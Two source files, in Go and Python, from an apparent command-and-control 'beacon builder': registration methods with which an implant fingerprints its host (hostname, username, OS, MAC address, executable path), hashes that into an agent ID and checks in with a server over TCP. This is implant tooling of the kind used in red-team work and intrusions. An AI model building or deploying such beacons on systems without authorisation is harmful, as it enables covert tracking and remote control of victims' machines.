File: beacon_builder/languages/go/core/registration.go
// Registration methods

func (b *GoBeacon) generateAgentID() string {
	hostname, _ := os.Hostname()
	currentUser, _ := user.Current()
	username := "unknown"
	if currentUser != nil {
		username = currentUser.Username
	}

	systemInfo := fmt.Sprintf("%s%s%s%s", hostname, username, runtime.GOOS, runtime.GOARCH)

	executable, _ := os.Executable()
	systemInfo += executable

	hash := md5.Sum([]byte(systemInfo))
	return hex.EncodeToString(hash[:])[:8]
}

func (b *GoBeacon) register() error {
	// Include schema filename for auto-assignment on server
	message := fmt.Sprintf("register|%s|%s|%s", b.AgentID, b.ComputerName, b.Schema)
	b.Logger.Printf("Attempting registration: %s", message)

	response, err := b.sendTCP(message, true)
	if err != nil {
		return err
	}

	b.Logger.Printf("Registration response: %s", response)
	return nil
}

File: beacon_builder/languages/python/core/registration.py
    # Registration methods - Added to PythonBeacon class

    def generate_agent_id(self):
        """Generate unique agent ID based on system information"""
        system_info = f"{platform.node()}{platform.system()}"

        # Add username (with fallback)
        try:
            username = os.getlogin()
        except:
            try:
                username = os.environ.get('USER', os.environ.get('USERNAME', 'unknown'))
            except:
                username = 'unknown'
        system_info += username

        # Add MAC address
        try:
            mac = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff)
                          for elements in range(0, 2*6, 2)][::-1])
            system_info += mac
        except:
            pass

        # Add script path
        system_info += os.path.abspath(__file__)

        # Generate hash
        return hashlib.md5(system_info.encode()).hexdigest()[:8]

    def register(self):
        """Register beacon with server"""
        message = f"register|{self.agent_id}|{self.computer_name}|{self.schema_file}"
        self.log(f"Attempting registration with message: {message}")
        response = self.send_message(message)
        self.log(f"Registration response: {response}")
        return response
